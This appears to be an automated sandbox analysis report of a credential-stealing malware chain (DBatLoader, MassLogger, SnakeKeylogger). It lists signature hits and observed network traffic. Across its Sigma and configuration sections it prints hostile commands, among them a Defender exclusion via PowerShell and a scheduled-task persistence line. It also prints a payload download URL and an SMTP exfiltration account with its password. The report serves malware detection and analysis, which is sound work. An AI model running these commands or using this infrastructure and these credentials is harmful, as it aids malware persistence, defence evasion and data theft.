8.2.rpkhzpuO.pif.265951f0.13.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x13623:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12b21:$a3: \Google\Chrome\User Data\Default\Login Data 0x12e2f:$a4: \Orbitum\User Data\Default\Login Data 0x13c27:$a5: \Kometa\User Data\Default\Login Data
31.2.rpkhzpuO.pif.2eaa4e5e.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.0.Microsofts.exe.6e0000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
10.0.Microsofts.exe.6e0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.0.Microsofts.exe.6e0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.0.Microsofts.exe.6e0000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler
10.0.Microsofts.exe.6e0000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data
31.2.rpkhzpuO.pif.2ecd0f08.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.25173f56.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.400000.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
21.2.rpkhzpuO.pif.34a96478.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x283fd:$a1: get_encryptedPassword 0x4061d:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0x28739:$a2: get_encryptedUsername 0x40959:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x2818a:$a3: get_timePasswordChanged 0x403aa:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x282ab:$a4: get_passwordField 0x404cb:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x28413:$a5: set_encryptedPassword 0x40633:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x29de3:$a7: get_logins 0x42003:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x29a94:$a8: GetOutlookPasswords 0x41cb4:$a8: GetOutlookPasswords
8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2d653:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x45873:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x2cb51:$a3: \Google\Chrome\User Data\Default\Login Data 0x44d71:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x2ce5f:$a4: \Orbitum\User Data\Default\Login Data 0x4507f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data 0x2dc57:$a5: \Kometa\User Data\Default\Login Data 0x45e77:$a5: \Kometa\User Data\Default\Login Data
4.2.x.exe.22065a8.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
8.2.rpkhzpuO.pif.264e5570.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.2fd96478.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.x.exe.2b20000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Click to see the 121 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5792, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5792, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 3080, ProcessName: rpkhzpuO.pif

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5792, TargetFilename: C:\Windows \SysWOW64\svchost.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5792, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Oupzhkpr.PIF" , ParentImage: C:\Users\Public\Libraries\Oupzhkpr.PIF, ParentProcessId: 2724, ParentProcessName: Oupzhkpr.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 5900, ProcessName: cmd.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3404, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1584, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5792, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5792, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 3080, ProcessName: rpkhzpuO.pif

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 3404, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3404, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f, ProcessId: 4340, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3404, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1584, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:46:57.454696+0100	2028371	3	Unknown Traffic	192.168.2.6	49712	41.185.8.252	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:47:04.894030+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49720	193.122.130.0	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: PO_KB#67897.cmd	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack	Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\x.exe	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: PO_KB#67897.cmd	Virustotal: Detection: 24%			Perma Link
Source: PO_KB#67897.cmd	ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 8.2.rpkhzpuO.pif.400000.3.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 21.2.rpkhzpuO.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 26.2.rpkhzpuO.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 31.2.rpkhzpuO.pif.400000.0.unpack

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49726 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.6:49712 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: rpkhzpuO.pif, 00000015.00000002.2531569622.0000000031ACA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2692149290.000000002D0CB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbIL source: rpkhzpuO.pif, 0000001F.00000002.2692149290.000000002D0CB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, 00000004.00000002.2212967585.0000000020800000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F260000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2209421224.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020819000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: rpkhzpuO.pif, 00000008.00000003.2176410380.000000002350A000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2276789747.0000000027A90000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2262951312.0000000025133000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2272905069.00000000264E5000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2565470254.0000000033743000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2626188397.0000000034A95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2627942016.0000000035F30000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000003.2314988058.0000000031AE5000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000002.2644300802.000000002E2E5000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000002.2646464054.000000002F7C0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000002.2639575698.000000002D083000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000003.2417739511.000000002B351000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000003.2505077127.000000002D0EA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2700260465.000000002FD95000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbXa source: rpkhzpuO.pif, 0000001A.00000003.2462367771.000000002B3DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2212967585.0000000020800000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F260000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168492490.00000000217A2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168492490.00000000217D1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2209421224.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020819000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303256685.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303256685.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000003.2401750651.0000000000893000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000003.2401750651.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2494620308.0000000000992000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2494620308.0000000000963000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B258B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02B258B4

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then jmp 02587394h	9_2_02587188
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then jmp 0258778Ch	9_2_02587538
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	9_2_02587E60
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then jmp 0258778Ch	9_2_02587528
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	9_2_02587E5E
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	9_2_02587F0F
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 02835782h	10_2_02835366
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 028351B9h	10_2_02834F08
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 02835782h	10_2_028356AF

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://lwaziacademy.com/wps/200_Oupzhkprnvw

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B3E2F0 InternetCheckConnectionA,

4_2_02B3E2F0

Source: global traffic

HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View

ASN Name: GridhostZA GridhostZA

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 41.185.8.252:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49720 -> 193.122.130.0:80

Source: global traffic	HTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49726 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: lwaziacademy.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
